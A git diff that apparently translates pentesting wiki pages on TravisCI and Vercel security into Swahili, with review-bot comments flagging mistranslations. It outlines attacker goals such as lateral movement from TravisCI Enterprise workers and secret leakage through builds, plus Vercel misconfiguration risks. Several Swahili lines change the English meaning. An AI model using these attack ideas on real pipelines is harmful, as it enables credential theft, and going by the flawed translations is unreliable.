+- Ili **kuhesabu faili zilizofichwa**, unaweza kuangalia kwa **faili za `.enc`** kwenye repo, kwa mistari inayofanana na `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` kwenye faili ya usanidi, au kwa **iv na funguo zilizofichwa** katika **Mabadiliko ya Mazingira** kama:
.png>)
### TODO:
-- Example build with reverse shell running on Windows/Mac/Linux
-- Example build leaking the env base64 encoded in the logs
+- Mfano wa ujenzi ukiwa na reverse shell ikifanya kazi kwenye Windows/Mac/Linux
+- Mfano wa ujenzi ukivuja mabadiliko ya mazingira yaliyofichwa kwa base64 kwenye kumbukumbu
### TravisCI Enterprise
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+Ikiwa mshambuliaji atakutana na mazingira yanayotumia **TravisCI enterprise** (maelezo zaidi kuhusu hii kwenye [**basic information**](basic-travisci-information.md#travisci-enterprise)), ataweza **kuanzisha ujenzi kwenye Worker.** Hii inamaanisha kwamba mshambuliaji ataweza kuhamasisha kwa upande wa server hiyo kutoka ambayo anaweza:
-- escape to the host?
-- compromise kubernetes?
-- compromise other machines running in the same network?
-- compromise new cloud credentials?
+- kutoroka kwa mwenyeji?
+- kuathiri kubernetes?
+- kuathiri mashine nyingine zinazofanya kazi kwenye mtandao huo huo?
+- kuathiri akreditivu mpya za wingu?
## References
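Review bot: `kuhamasisha` is the wrong verb in two of the `+` lines, `kuunda PRs kwa repo na kuhamasisha siri` (for "exfiltrate the secrets") and `kuhamasisha kwa upande wa server hiyo` (for "move laterally to that server"); it means "to motivate/mobilise", so the attack description no longer says what the English says. Suggest `kuvujisha siri` (or `kutoa siri nje`) and `kuhamia kwa upande hadi seva hiyo`. In the same hunk "encrypted" is consistently rendered with `-fichwa` (hidden): `siri za kawaida zilizofichwa`, `faili zilizofichwa`, `iv na funguo zilizofichwa`. The established term is `-simbwa` (`usimbaji fiche`), and `kawaida` means "ordinary", not "custom" (`maalum`), so "custom encrypted secrets" should read `siri maalum zilizosimbwa`. The TODO line `yaliyofichwa kwa base64` has the same problem for "base64 encoded", which is an encoding, not encryption; keeping `base64 encoded` as a term is clearer than `yaliyofichwa`.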
@@ -63,7 +63,3 @@ If an attacker ends in an environment which uses **TravisCI enterprise** (more i
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 46b10bf38..5111b0454 100644
--- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -4,45 +4,42 @@
## Access
-TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+TravisCI moja kwa moja inajumuisha na majukwaa tofauti ya git kama Github, Bitbucket, Assembla, na Gitlab. Itamuuliza mtumiaji kutoa ruhusa kwa TravisCI kuweza kufikia repos anazotaka kuunganisha na TravisCI.
-For example, in Github it will ask for the following permissions:
+Kwa mfano, katika Github itahitaji ruhusa zifuatazo:
-- `user:email` (read-only)
-- `read:org` (read-only)
-- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+- `user:email` (kusoma tu)
+- `read:org` (kusoma tu)
+- `repo`: Inatoa ruhusa ya kusoma na kuandika kwa msimbo, hali za kujitolea, washirikishi, na hali za kutekeleza kwa hazina za umma na za kibinafsi na mashirika.
## Encrypted Secrets
### Environment Variables
-In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+Katika TravisCI, kama ilivyo katika majukwaa mengine ya CI, inawezekana **kuhifadhi siri kwenye kiwango cha repo** ambazo zitahifadhiwa kwa njia ya siri na **kuondolewa na kusukumwa kwenye mabadiliko ya mazingira** ya mashine inayotekeleza ujenzi.
.png>)
-It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+Inawezekana kuashiria **matawi ambayo siri zitapatikana** (kwa kawaida yote) na pia kama TravisCI **inapaswa kuficha thamani yake** ikiwa itaonekana **katika kumbukumbu** (kwa kawaida itafanya hivyo).
### Custom Encrypted Secrets
-For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repositoryās **public key available** to those who have **access** to the repository.
-
-You can access the public key of one repo with:
+Kwa **kila repo** TravisCI inazalisha **RSA keypair**, **inaweka** ile **binafsi**, na inafanya **funguo za umma za hazina** kupatikana kwa wale walio na **ufikiaji** wa hazina hiyo.
+Unaweza kufikia funguo za umma za repo moja kwa:
```
travis pubkey -r /
travis pubkey -r carlospolop/t-ci-test
```
-
-Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+Kisha, unaweza kutumia mipangilio hii **kuweka siri na kuziongeza kwenye `.travis.yaml`**. Siri zitakuwa **zinatolewa wakati ujenzi unafanywa** na zinapatikana katika **mabadiliko ya mazingira**.
.png>)
-Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+Kumbuka kwamba siri zilizowekwa kwa njia hii hazitaonekana kwenye orodha ya mabadiliko ya mazingira ya mipangilio.
-### Custom Encrypted Files
-
-Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+### Faili za Kijalala Zilizowekwa
+Kwa njia ile ile kama hapo awali, TravisCI pia inaruhusu **kuweka faili na kisha kuzitoa wakati wa ujenzi**:
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
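Review bot: translating the heading `### Custom Encrypted Files` to `### Faili za Kijalala Zilizowekwa` changes the heading's generated anchor and is inconsistent with every other heading in this file (`## Access`, `## Encrypted Secrets`, `### Environment Variables`, `### Custom Encrypted Secrets`), which the hunk leaves in English; `kijalala` is also not a recognisable Swahili term. Suggest keeping the heading in English like its siblings. Two wording errors in the same hunk: `hali za kujitolea` for "commit statuses" means "volunteering statuses" (keep the Git term, `hali za commit`), and "decrypted" is rendered as `kuondolewa` ("removed") in `kuondolewa na kusukumwa kwenye mabadiliko ya mazingira` and as `zinatolewa` ("are handed out") in `Siri zitakuwa zinatolewa wakati ujenzi unafanywa`; `kusimbuliwa` is the term for decryption.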
@@ -52,7 +49,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
- openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
-
Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
.png>)
## TravisCI Enterprise
-Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the āserverā version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+Travis CI Enterprise ni **toleo la ndani la Travis CI**, ambalo unaweza kupeleka **katika miundombinu yako**. Fikiria kuhusu toleo la 'server' la Travis CI. Kutumia Travis CI kunakuwezesha kuwezesha mfumo rahisi wa Kuendelea Kuunganisha/Kuendelea Kuweka (CI/CD) katika mazingira, ambayo unaweza kuunda na kulinda kama unavyotaka.
-**Travis CI Enterprise consists of two major parts:**
+**Travis CI Enterprise ina sehemu mbili kuu:**
-1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
-2. TCI **Worker** and build environment images (also called OS images).
+1. TCI **huduma** (au TCI Core Services), inayohusika na kuunganishwa na mifumo ya kudhibiti toleo, kuidhinisha ujenzi, kupanga kazi za ujenzi, nk.
+2. TCI **Worker** na picha za mazingira ya ujenzi (pia huitwa picha za OS).
-**TCI Core services require the following:**
+**Huduma za TCI Core zinahitaji yafuatayo:**
-1. A **PostgreSQL11** (or later) database.
-2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
-3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+1. Hifadhidata ya **PostgreSQL11** (au baadaye).
+2. Miundombinu ya kupeleka klasta ya Kubernetes; inaweza kupelekwa katika klasta ya seva au katika mashine moja ikiwa inahitajika.
+3. Kulingana na mipangilio yako, unaweza kutaka kupeleka na kuunda baadhi ya vipengele mwenyewe, mfano, RabbitMQ - angalia [Kuweka Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) kwa maelezo zaidi.
-**TCI Worker requires the following:**
+**Worker wa TCI unahitaji yafuatayo:**
-1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
-2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+1. Miundombinu ambapo picha ya docker inayojumuisha **Worker na picha ya ujenzi iliyounganishwa inaweza kupelekwa**.
+2. Uunganisho kwa baadhi ya vipengele vya Huduma za Msingi za Travis CI - angalia [Kuweka Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) kwa maelezo zaidi.
-The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+Kiasi cha picha za OS za TCI Worker na mazingira ya ujenzi zilizopelekwa kitaamua uwezo wa jumla wa sambamba wa kupeleka Travis CI Enterprise katika miundombinu yako.
.png>)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
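Review bot: the sentence `Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:` is left untouched as a context line while every paragraph around it is translated, so the rendered page switches back to English for one line between the code block and the screenshot; it should be included in the translation. In the Enterprise paragraphs, "Continuous Deployment" becomes `Kuendelea Kuweka` ("continuing to put"), which does not convey deployment; keeping the acronym `CI/CD` with its English expansion, or using `Usambazaji Endelevu`, would read better. `picha` for "build environment images" and "docker image" means "pictures"; the docs elsewhere keep `image` as a term, and doing the same here avoids the ambiguity.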
diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md
index 16dc93da7..5c143a8cf 100644
--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -4,160 +4,160 @@
## Basic Information
-In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
+Katika Vercel, **Team** ni **environment** kamili inayomilikiwa na mteja na **project** ni **application**.
-For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
+Kwa ajili ya ukaguzi wa kuimarisha wa **Vercel**, unahitaji kuomba mtumiaji mwenye **Viewer role permission** au angalau **Project viewer permission over the projects** ili kuangalia (ikiwa unahitaji tu kuangalia miradi na si usanidi wa Team pia).
## Project Settings
### General
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
+**Purpose:** Kusimamia mipangilio ya msingi ya mradi kama vile jina la mradi, mfumo, na mipangilio ya kujenga.
#### Security Configurations:
- **Transfer**
- - **Misconfiguration:** Allows to transfer the project to another team
- - **Risk:** An attacker could steal the project
+- **Misconfiguration:** Inaruhusu kuhamasisha mradi kwa timu nyingine
+- **Risk:** Mshambuliaji anaweza kuiba mradi
- **Delete Project**
- - **Misconfiguration:** Allows to delete the project
- - **Risk:** Delete the prject
+- **Misconfiguration:** Inaruhusu kufuta mradi
+- **Risk:** Futa mradi
---
### Domains
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
+**Purpose:** Kusimamia maeneo maalum, mipangilio ya DNS, na mipangilio ya SSL.
#### Security Configurations:
- **DNS Configuration Errors**
- - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- - **Risk:** Domain hijacking, traffic interception, and phishing attacks.
+- **Misconfiguration:** Rekodi za DNS zisizo sahihi (A, CNAME) zinazoelekeza kwenye seva za uhalifu.
+- **Risk:** Hijacking ya domain, kukamata trafiki, na mashambulizi ya phishing.
- **SSL/TLS Certificate Management**
- - **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
+- **Misconfiguration:** Kutumia vyeti dhaifu au vilivyokwisha muda.
+- **Risk:** Kuwa hatarini kwa mashambulizi ya mtu katikati (MITM), kuathiri uaminifu wa data na faragha.
- **DNSSEC Implementation**
- - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
+- **Misconfiguration:** Kukosa kuwezesha DNSSEC au mipangilio isiyo sahihi ya DNSSEC.
+- **Risk:** Kuongezeka kwa uwezekano wa DNS spoofing na mashambulizi ya cache poisoning.
- **Environment used per domain**
- - **Misconfiguration:** Change the environment used by the domain in production.
- - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
+- **Misconfiguration:** Kubadilisha mazingira yanayotumika na domain katika uzalishaji.
+- **Risk:** Kuonyesha siri au kazi zinazoweza kuwa hazipatikani katika uzalishaji.
---
### Environments
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
+**Purpose:** Mwelekeo wa mazingira tofauti (Development, Preview, Production) na mipangilio maalum na vigezo.
#### Security Configurations:
- **Environment Isolation**
- - **Misconfiguration:** Sharing environment variables across environments.
- - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
+- **Misconfiguration:** Kushiriki vigezo vya mazingira kati ya mazingira.
+- **Risk:** Kuvuja kwa siri za uzalishaji katika mazingira ya maendeleo au mapitio, kuongezeka kwa uwezekano wa kufichuliwa.
- **Access to Sensitive Environments**
- - **Misconfiguration:** Allowing broad access to production environments.
- - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
+- **Misconfiguration:** Kuruhusu ufikiaji mpana kwa mazingira ya uzalishaji.
+- **Risk:** Mabadiliko yasiyoidhinishwa au ufikiaji wa maombi ya moja kwa moja, kupelekea uwezekano wa kushindwa au uvunjaji wa data.
---
### Environment Variables
-**Purpose:** Manage environment-specific variables and secrets used by the application.
+**Purpose:** Kusimamia vigezo maalum vya mazingira na siri zinazotumika na application.
#### Security Configurations:
- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Kuongeza alama ya `NEXT_PUBLIC_` kwa vigezo nyeti, na kuifanya ipatikane upande wa mteja.
+- **Risk:** Kuonyeshwa kwa funguo za API, akidi za database, au data nyingine nyeti kwa umma, kupelekea uvunjaji wa data.
- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Ikiwa imezimwa (kawaida) inawezekana kusoma thamani za siri zilizozalishwa.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
- **Shared Environment Variables**
- - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Hizi ni vigezo vya mazingira vilivyowekwa katika kiwango cha Team na vinaweza pia kuwa na taarifa nyeti.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
---
### Git
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
+**Purpose:** Kuunda mipangilio ya Git repository, ulinzi wa matawi, na vichocheo vya kutekeleza.
#### Security Configurations:
- **Ignored Build Step (TODO)**
- - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- - **Risk:** TBD
+- **Misconfiguration:** Inaonekana kama chaguo hili linaruhusu kuunda script/maagizo ya bash ambayo yatatekelezwa wakati commit mpya inasukumwa katika Github, ambayo inaweza kuruhusu RCE.
+- **Risk:** TBD
---
### Integrations
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
+**Purpose:** Kuunganisha huduma na zana za upande wa tatu ili kuboresha kazi za mradi.
#### Security Configurations:
- **Insecure Third-Party Integrations**
- - **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
+- **Misconfiguration:** Kuunganisha na huduma za upande wa tatu zisizoaminika au zisizo salama.
+- **Risk:** Kuanzisha udhaifu, kuvuja kwa data, au milango ya nyuma kupitia uunganisho ulioathirika.
- **Over-Permissioned Integrations**
- - **Misconfiguration:** Granting excessive permissions to integrated services.
- - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
+- **Misconfiguration:** Kutoa ruhusa nyingi kwa huduma zilizounganishwa.
+- **Risk:** Ufikiaji usioidhinishwa wa rasilimali za mradi, urekebishaji wa data, au usumbufu wa huduma.
- **Lack of Integration Monitoring**
- - **Misconfiguration:** Failing to monitor and audit third-party integrations.
- - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
+- **Misconfiguration:** Kukosa kufuatilia na kukagua uunganisho wa upande wa tatu.
+- **Risk:** Ugunduzi wa kuchelewa wa uunganisho ulioathirika, kuongezeka kwa athari za uvunjaji wa usalama.
---
### Deployment Protection
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
+**Purpose:** Kulinda kutekeleza kupitia mitambo mbalimbali ya ulinzi, kudhibiti nani anaweza kufikia na kutekeleza kwenye mazingira yako.
#### Security Configurations:
**Vercel Authentication**
-- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
+- **Misconfiguration:** Kuondoa uthibitisho au kutotekeleza ukaguzi wa wanachama wa timu.
+- **Risk:** Watumiaji wasioidhinishwa wanaweza kufikia kutekeleza, kupelekea uvunjaji wa data au matumizi mabaya ya application.
**Protection Bypass for Automation**
-- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
+- **Misconfiguration:** Kuonyesha siri ya bypass hadharani au kutumia siri dhaifu.
+- **Risk:** Wavamizi wanaweza kupita ulinzi wa kutekeleza, wakipata na kubadilisha kutekeleza kulindwa.
**Shareable Links**
-- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
+- **Misconfiguration:** Kushiriki viungo bila kuchuja au kukosa kufuta viungo vya zamani.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza kulindwa, kupita uthibitisho na vizuizi vya IP.
**OPTIONS Allowlist**
-- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
+- **Misconfiguration:** Kuruhusu njia pana sana au mwisho wa nyeti.
+- **Risk:** Wavamizi wanaweza kutumia njia zisizo salama kufanya vitendo visivyoidhinishwa au kupita ukaguzi wa usalama.
**Password Protection**
-- **Misconfiguration:** Using weak passwords or sharing them insecurely.
-- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Kutumia nywila dhaifu au kuzishiriki kwa njia isiyo salama.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza ikiwa nywila zitakisiwa au kuvuja.
+- **Note:** Inapatikana kwenye mpango wa **Pro** kama sehemu ya **Advanced Deployment Protection** kwa $150/ mwezi zaidi.
**Deployment Protection Exceptions**
-- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Kuongeza maeneo ya uzalishaji au nyeti kwenye orodha ya visingizio bila kukusudia.
+- **Risk:** Kuonyesha kutekeleza muhimu kwa umma, kupelekea kuvuja kwa data au ufikiaji usioidhinishwa.
+- **Note:** Inapatikana kwenye mpango wa **Pro** kama sehemu ya **Advanced Deployment Protection** kwa $150/ mwezi zaidi.
**Trusted IPs**
-- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-- **Note:** Available on the **Enterprise** plan.
+- **Misconfiguration:** Kuweka vibaya anwani za IP au anuwai za CIDR.
+- **Risk:** Watumiaji halali kuzuia au IP zisizoidhinishwa kupata ufikiaji.
+- **Note:** Inapatikana kwenye mpango wa **Enterprise**.
---
### Functions
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
+**Purpose:** Kuunda mipangilio ya kazi zisizo na seva, ikiwa ni pamoja na mipangilio ya wakati, ugawaji wa kumbukumbu, na sera za usalama.
#### Security Configurations:
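Review bot: the `+` lines flatten the nested lists: the original `-   - **Misconfiguration:**` and `-   - **Risk:**` are indented children of items such as `- **Transfer**`, `- **Delete Project**`, `- **DNS Configuration Errors**` and `- **Exposing Sensitive Variables**`, but the replacements `+- **Misconfiguration:**` / `+- **Risk:**` are top-level bullets, so the rendered page no longer shows which misconfiguration and risk belong to which item. Restore the leading indentation on those lines (the same flattening recurs in every later hunk of this file). Two wording points: `Inaruhusu kuhamasisha mradi kwa timu nyingine` uses `kuhamasisha` ("to motivate") for "transfer"; the intended word is `kuhamisha`. "Deployments" is rendered throughout as `kutekeleza` (the verb "to execute"), so `Ufikiaji usioidhinishwa wa kutekeleza kulindwa` reads as "unauthorised access to executing protected"; keeping `deployment` as a term (as the section title `### Deployment Protection` does) or using `uwekaji` would be clearer, and `mwisho wa nyeti` for "sensitive endpoints" should be `endpoints nyeti`.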
@@ -167,81 +167,81 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
### Data Cache
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
+**Purpose:** Kusimamia mikakati na mipangilio ya caching ili kuboresha utendaji na kudhibiti uhifadhi wa data.
#### Security Configurations:
- **Purge Cache**
- - **Misconfiguration:** It allows to delete all the cache.
- - **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
+- **Misconfiguration:** Inaruhusu kufuta cache yote.
+- **Risk:** Watumiaji wasioidhinishwa wakifuta cache kupelekea uwezekano wa DoS.
---
### Cron Jobs
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
+**Purpose:** Kuunda kazi za kiotomatiki na scripts kuendesha kwa vipindi vilivyotajwa.
#### Security Configurations:
- **Disable Cron Job**
- - **Misconfiguration:** It allows to disable cron jobs declared inside the code
- - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
+- **Misconfiguration:** Inaruhusu kuzima kazi za cron zilizotangazwa ndani ya msimbo
+- **Risk:** Ukatishaji wa huduma (kutegemea ni nini kazi za cron zilikuwa zikitumika)
---
### Log Drains
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
+**Purpose:** Kuunda huduma za nje za kuandika ili kukamata na kuhifadhi kumbukumbu za application kwa ajili ya kufuatilia na kukagua.
#### Security Configurations:
-- Nothing (managed from teams settings)
+- Nothing (inayosimamiwa kutoka mipangilio ya timu)
---
### Security
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
+**Purpose:** Kituo cha kati kwa mipangilio mbalimbali zinazohusiana na usalama zinazoathiri ufikiaji wa mradi, ulinzi wa chanzo, na zaidi.
#### Security Configurations:
**Build Logs and Source Protection**
-- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
+- **Misconfiguration:** Kuondoa ulinzi au kuonyesha njia za `/logs` na `/src` hadharani.
+- **Risk:** Ufikiaji usioidhinishwa wa kumbukumbu za kujenga na msimbo wa chanzo, kupelekea kuvuja kwa taarifa na uwezekano wa kutumia udhaifu.
**Git Fork Protection**
-- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
+- **Misconfiguration:** Kuruhusu ombi zisizoidhinishwa bila ukaguzi sahihi.
+- **Risk:** Msimbo mbaya unaweza kuunganishwa kwenye msingi wa msimbo, kuanzisha udhaifu au milango ya nyuma.
**Secure Backend Access with OIDC Federation**
-- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-- **Risk:** Unauthorized access to backend services through flawed authentication flows.
+- **Misconfiguration:** Kuweka vibaya vigezo vya OIDC au kutumia URL zisizo salama za mtoaji.
+- **Risk:** Ufikiaji usioidhinishwa wa huduma za nyuma kupitia mchakato wa uthibitisho ulio na kasoro.
**Deployment Retention Policy**
-- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
+- **Misconfiguration:** Kuweka vipindi vya uhifadhi kuwa vifupi sana (kupoteza historia ya kutekeleza) au virefu sana (uhifadhi wa data usio wa lazima).
+- **Risk:** Kutokuweza kufanya kurudi nyuma inapohitajika au kuongezeka kwa hatari ya kufichuliwa kwa data kutoka kwa kutekeleza zamani.
**Recently Deleted Deployments**
-- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
+- **Misconfiguration:** Kukosa kufuatilia kutekeleza zilizofutwa au kutegemea tu kufutwa kwa kiotomatiki.
+- **Risk:** Kupoteza historia muhimu ya kutekeleza, kuzuia ukaguzi na kurudi nyuma.
---
### Advanced
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
+**Purpose:** Ufikiaji wa mipangilio ya ziada ya mradi kwa ajili ya kuboresha mipangilio na kuimarisha usalama.
#### Security Configurations:
**Directory Listing**
-- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
+- **Misconfiguration:** Kuwezesha orodha ya orodha kunaruhusu watumiaji kuona maudhui ya orodha bila faili ya index.
+- **Risk:** Kuonyeshwa kwa faili nyeti, muundo wa application, na maeneo yanayoweza kuwa na hatari kwa mashambulizi.
---
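Review bot: `Kuwezesha orodha ya orodha` for "Enabling directory listing" reads as "enabling a list of lists"; a directory is `saraka`, so `Kuwezesha uorodheshaji wa saraka` carries the meaning. In the Log Drains item `- Nothing (inayosimamiwa kutoka mipangilio ya timu)` the word `Nothing` is left in English inside an otherwise translated line (`Hakuna`). Under Git Fork Protection, `Kuruhusu ombi zisizoidhinishwa bila ukaguzi sahihi` turns "pull requests" into generic `ombi` ("requests"); keep `pull requests` as the Git term so the fork-protection point is recognisable. The Purge Cache and Disable Cron Job entries also lose their list indentation (`+- **Misconfiguration:**` replacing the indented child bullets), as in the previous hunk.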
@@ -253,13 +253,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
**Enable Attack Challenge Mode**
-- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-- **Risk:** Potential user experience problems.
+- **Misconfiguration:** Kuwezesha hii kunaboresha ulinzi wa application ya wavuti dhidi ya DoS lakini kwa gharama ya matumizi
+- **Risk:** Matatizo ya uwezekano wa uzoefu wa mtumiaji.
### Custom Rules & IP Blocking
-- **Misconfiguration:** Allows to unblock/block traffic
-- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
+- **Misconfiguration:** Inaruhusu kuzuia/kufungua trafiki
+- **Risk:** Uwezekano wa DoS ukiruhusu trafiki ya uhalifu au kuzuia trafiki ya halali
---
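Review bot: `Matatizo ya uwezekano wa uzoefu wa mtumiaji` inverts the word order of "Potential user experience problems" and reads as "problems of the possibility of user experience"; `Uwezekano wa matatizo ya uzoefu wa mtumiaji` keeps the original sense.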
@@ -267,13 +267,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
### Source
-- **Misconfiguration:** Allows access to read the complete source code of the application
-- **Risk:** Potential exposure of sensitive information
+- **Misconfiguration:** Inaruhusu ufikiaji wa kusoma msimbo kamili wa application
+- **Risk:** Uwezekano wa kufichuliwa kwa taarifa nyeti
### Skew Protection
-- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
+- **Misconfiguration:** Ulinzi huu unahakikisha mteja na application ya seva kila wakati wanatumia toleo sawa ili kusiwe na kutokuelewana ambapo mteja anatumia toleo tofauti na seva na hivyo hawaelewani.
+- **Risk:** Kuondoa hii (ikiwa imewezeshwa) kunaweza kusababisha matatizo ya DoS katika kutekeleza mpya siku zijazo
---
